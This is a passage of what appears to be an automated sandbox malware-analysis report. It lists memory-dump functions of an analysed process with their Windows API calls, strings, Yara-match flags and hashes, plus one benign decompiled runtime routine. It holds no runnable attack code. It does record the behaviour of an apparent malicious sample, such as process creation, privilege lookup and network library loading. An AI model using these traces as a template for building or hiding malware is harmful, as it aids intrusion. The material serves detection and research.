                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: 92b6c21bbef76c3a8d5bc1276f6f2fb9934f4006bd11854a24bae3bdd5b7b0af
                                                                    • Instruction ID: 0cd7fe7dca4294823e41efd38cbbf14d9a61ad7a9f43e7dcd7c162afb7ccd5a7
                                                                    • Opcode Fuzzy Hash: 92b6c21bbef76c3a8d5bc1276f6f2fb9934f4006bd11854a24bae3bdd5b7b0af
                                                                    • Instruction Fuzzy Hash: BA3190B1601704AFC716DFA8D8A2FA7B7B8EF49700F04841DF61A9B241D730B945CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A6EC6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 003A6F78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: cbb7a1f3f8af2a6579b908a3d50c24228f19b503ceea48c3b139ee7484fc73f2
                                                                    • Instruction ID: b91c6b731afc2ff6b61da5547faaa57dde324022f2afb253341965e4ec4729e8
                                                                    • Opcode Fuzzy Hash: cbb7a1f3f8af2a6579b908a3d50c24228f19b503ceea48c3b139ee7484fc73f2
                                                                    • Instruction Fuzzy Hash: 2831A5B1605300AFCB15DFA8D8A2FAABBB4FF49704F14811DF5199B241D370A955CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A84BB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00393B93), ref: 003A84ED
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: .z`
                                                                    • API String ID: 3298025750-1441809116
                                                                    • Opcode ID: 82959d017dfe97b628cab23ae1aba3fa1605f111ab74100c3ebdce2326e51f1e
                                                                    • Instruction ID: 2c1f6412f2cca43225e7f83cc663087452d4d120ef7bbf975f49b71985de50b9
                                                                    • Opcode Fuzzy Hash: 82959d017dfe97b628cab23ae1aba3fa1605f111ab74100c3ebdce2326e51f1e
                                                                    • Instruction Fuzzy Hash: 76E01AB5600214ABDB14DF58DC49EA77769EF88760F018594FE086B381CA30ED10CAE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A84C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00393B93), ref: 003A84ED
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: .z`
                                                                    • API String ID: 3298025750-1441809116
                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction ID: 2fa56f2e87481f7519aee76e16f981db5dad8361c500b4121fa7dc5ec6abb8b1
                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction Fuzzy Hash: ABE01AB12002046BDB14DF59CC49EA777ACEF88750F018554BA085B241CA30E9108AF0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00397260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 003972BA
                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 003972DB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
                                                                    • Instruction ID: da3b80a45445c0798a721602ccae16f3ca6cf219e08bdc887516cde84cb6d953
                                                                    • Opcode Fuzzy Hash: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
                                                                    • Instruction Fuzzy Hash: 0301A732A9032876EB22A6949C03FFE776C9B01B50F150519FF04BE1C2E694690687F5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00399B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00399B82
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction ID: fa1243a1c8d010c27618c03952563046109f75637f2c6fbd2c98ab0dea072077
                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction Fuzzy Hash: 22011EB6D4020DABDF11EAE4EC42F9DB3789B54308F004195E9089B241F675EB14CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A852D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003A8584
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 86d7359de6db88fdea2afa59c4bc501cc9350f4b75a0a64e2d08058f7d4c58d5
                                                                    • Instruction ID: 00b717b1bae14f75fc5d4b6f44abfbb05f8d87784e38298e922ac75f5d5b56ce
                                                                    • Opcode Fuzzy Hash: 86d7359de6db88fdea2afa59c4bc501cc9350f4b75a0a64e2d08058f7d4c58d5
                                                                    • Instruction Fuzzy Hash: 2E01E4B2200108AFCB08DF88CC91EEB77ADAF8C750F118208FA0D97240C630EC41CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A8530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003A8584
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction ID: 7f1979d0d40398b448d90200c28a7591eda64bd59104923a6469393b03a6a53f
                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction Fuzzy Hash: 4001AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A84F2, Relevance: 1.5, APIs: 1, Instructions: 39processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003A8584
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 7b91458eaaf02f6877a61dca271c6622ed7e501b6fb3df531fdb2ffd8ecac201
                                                                    • Instruction ID: 932166718c1c8494d8be10b4f6bd178b04b45441ec6ff196ac732642b26ad9be
                                                                    • Opcode Fuzzy Hash: 7b91458eaaf02f6877a61dca271c6622ed7e501b6fb3df531fdb2ffd8ecac201
                                                                    • Instruction Fuzzy Hash: 54F027316042087AD721DBA89C88EE77B9CDF86750F00C5A9F99D6F242C931E90187F0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A7000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0039CCC0,?,?), ref: 003A703C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                    • Instruction ID: bb50e53087831256222951329afb1d3589e8cbc4761eebedcdcc78c8d79d7a29
                                                                    • Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                    • Instruction Fuzzy Hash: F0E092333803043AE7316599AC03FA7B39CDB92B20F150026FA0DEB2C1D595F90142A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A8612, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0039CF92,0039CF92,?,00000000,?,?), ref: 003A8650
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: dc10fbabf8b7bdb268af672b593ba086ad1b628e858e035e50d02800941f0fd8
                                                                    • Instruction ID: 444962a1716e0bb7d73da62cf8f71ff059871ce32d3f01ee34ca607b316f8f9e
                                                                    • Opcode Fuzzy Hash: dc10fbabf8b7bdb268af672b593ba086ad1b628e858e035e50d02800941f0fd8
                                                                    • Instruction Fuzzy Hash: 38F039B1600214AFDB15DF58DC85FE73769EF89250F118154FA599B381CA31A922CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A6FFD, Relevance: 1.5, APIs: 1, Instructions: 29threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0039CCC0,?,?), ref: 003A703C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 434a433fcace04e5a32d79841e4669bfd0f93984811bc85f4b6640686a25b9be
                                                                    • Instruction ID: 17bba81a6be881fb4d23664d978b83f133ecad8b60e62ac75ff17efe6afd43df
                                                                    • Opcode Fuzzy Hash: 434a433fcace04e5a32d79841e4669bfd0f93984811bc85f4b6640686a25b9be
                                                                    • Instruction Fuzzy Hash: 02E0207738030036E73166948C03FD77758CF92F10F150019FA49AF2C1D595FD014254
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A8480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(003A3506,?,003A3C7F,003A3C7F,?,003A3506,?,?,?,?,?,00000000,00000000,?), ref: 003A84AD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                    • Instruction ID: 43dd4b53139dfdad2c8740a61561b4e0fc6e3c91e8d42c7ac14b6fc30fd2034f
                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                    • Instruction Fuzzy Hash: 59E012B1200208ABDB14EF99CC45EA777ACEF88650F118558BA085B282CA30F9108AF0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A8620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0039CF92,0039CF92,?,00000000,?,?), ref: 003A8650
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction ID: 8338f54d27abd3039f82771674109384e180c406897f3abd4f04d965bc2e5a3e
                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction Fuzzy Hash: CDE01AB16002086BDB10DF49CC85EE737ADEF89650F018154BA085B241C930E8108BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0039D3F8, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00397C63,?), ref: 0039D42B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: b3fa86073e4f7c890201e0e84b38854a440118736aa9edb98764bfc91aa5b8b0
                                                                    • Instruction ID: 6d717dd22a96a2934e3ad54f30a5470c420457a79803751996646e4cde35ceb8
                                                                    • Opcode Fuzzy Hash: b3fa86073e4f7c890201e0e84b38854a440118736aa9edb98764bfc91aa5b8b0
                                                                    • Instruction Fuzzy Hash: 1ED0C2B67902003EEB14EBE09C57F16618D9751304F09006CF5459A2C3D954D0048220
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0039D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00397C63,?), ref: 0039D42B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                    • Instruction ID: 8619672caa1b5cb277784dd841e312b2cf80849cf6e1b845f199a99d6a339dfb
                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                    • Instruction Fuzzy Hash: 78D0A7727903043BEA10FAE49C03F2672CD9B45B00F494064FA48DB3C3ED60F5004161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E0967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d535db925a4d7361a12089fdf0a2c712f3ebd9977844f00d0646216a63ef7003
                                                                    • Instruction ID: b8dd820d404cd40c2991741faf99a61c453cf6f900f57203b5b44003962906fb
                                                                    • Opcode Fuzzy Hash: d535db925a4d7361a12089fdf0a2c712f3ebd9977844f00d0646216a63ef7003
                                                                    • Instruction Fuzzy Hash: 03B09B719414D5C5D611D7A05A087177D0477D0745F16D561D1020645B477CC0D1F5B5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 02E5FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 53%
                                                                    			E02E5FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02E0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02E55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02E55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                    0x02e5fdda
                                                                    0x02e5fde2
                                                                    0x02e5fde5
                                                                    0x02e5fdec
                                                                    0x02e5fdfa
                                                                    0x02e5fdff
                                                                    0x02e5fe0a
                                                                    0x02e5fe0f
                                                                    0x02e5fe17
                                                                    0x02e5fe1e
                                                                    0x02e5fe19
                                                                    0x02e5fe19
                                                                    0x02e5fe19
                                                                    0x02e5fe20
                                                                    0x02e5fe21
                                                                    0x02e5fe22
                                                                    0x02e5fe25
                                                                    0x02e5fe40

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E5FDFA
                                                                    Strings
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02E5FE01
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02E5FE2B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: 73023edd5b640cc8358d67c826b635191487c9404bc9fbe8758efc0d67c3c7ae
                                                                    • Instruction ID: a5fe2f2e93d0aea914572e3b9c762fc820b290ad35232beded495038a51de873
                                                                    • Opcode Fuzzy Hash: 73023edd5b640cc8358d67c826b635191487c9404bc9fbe8758efc0d67c3c7ae
                                                                    • Instruction Fuzzy Hash: 9DF0F632280211BFE6211A55DC06F63BF6BEB45730F249315FA29565D1DEA2FC60C6F4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%